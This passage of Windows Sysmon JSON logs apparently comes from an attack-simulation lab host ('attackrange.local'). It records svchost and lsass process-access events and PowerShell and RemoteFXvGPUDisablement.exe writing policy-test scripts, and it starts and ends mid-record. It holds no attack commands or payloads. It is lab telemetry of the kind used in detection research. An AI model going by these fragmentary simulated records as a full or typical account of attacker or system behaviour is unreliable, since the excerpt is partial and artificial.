C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:00.897","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010773D0100}","TargetProcessId":"2160","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":981,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:01.303\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 588\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nTargetProcessId: 852\r\nTargetImage: C:\\Windows\\system32\\services.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:01.303","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"588","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","TargetProcessId":"852","TargetImage":"C:\\Windows\\system32\\services.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":982,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:01.303\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:01.303","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":983,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:01.303\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:01.303","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":984,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:01.318\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 588\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:01.318","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"588","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":985,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:01.318\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 588\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:01.318","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"588","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1fb7a|C:\\Windows\\SYSTEM32\\samsrv.dll+5df1|C:\\Windows\\SYSTEM32\\samsrv.dll+5cf2|C:\\Windows\\SYSTEM32\\samsrv.dll+184ee|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":986,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:01.318\r\nSourceProcessGUID: {E2A3D6B1-105B-5F25-0000-001015C40000}\r\nSourceProcessId: 1196\r\nSourceThreadId: 1380\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-0010DFCF0000}\r\nTargetProcessId: 1336\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x100000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:49:01.318","SourceProcessGUID":"{E2A3D6B1-105B-5F25-0000-001015C40000}","SourceProcessId":"1196","SourceThreadId":"1380","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-0010DFCF0000}","TargetProcessId":"1336","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x100000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|c:\\windows\\system32\\es.dll+118e5|c:\\windows\\system32\\es.dll+13b72|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+7cf9|C:\\Windows\\System32\\combase.dll+1319|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":987,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:01.490\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-0010773D0100}\r\nProcessId: 2160\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Windows\\Temp\\__PSScriptPolicyTest_f0ws2u0l.qrl.ps1\r\nCreationUtcTime: 2020-08-01 06:49:01.490","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:01.490","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-0010773D0100}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Windows\\Temp\\__PSScriptPolicyTest_f0ws2u0l.qrl.ps1","CreationUtcTime":"2020-08-01 06:49:01.490","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":988,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:01.490\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-0010873A0100}\r\nProcessId: 2116\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Windows\\Temp\\__PSScriptPolicyTest_dizln1ie.1ka.ps1\r\nCreationUtcTime: 2020-08-01 06:49:01.490","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:49:01.490","ProcessGuid":"{E2A3D6B1-105B-5F25-0000-0010873A0100}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Windows\\Temp\\__PSScriptPolicyTest_dizln1ie.1ka.ps1","CreationUtcTime":"2020-08-01 06:49:01.490","EventReceivedTime":"2020-08-01 06:49:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:49:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":989,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:49:01.553\r\nProcessGuid: {E2A3D6B1-105B-5F25-0000-00107F3E0100}\r\nProcessId: 2168\r\nImage: C:\\Windows\\System32\\RemoteFXvGPUDisablement.exe\r\nTargetFilename: C:\\Windows\\Temp\\__PSScriptPolicyTest_awfn0abc.c05.ps1\r\nCreationUtcTime: 2020-08-01 06:49:01.553","Category":"File created (rule: 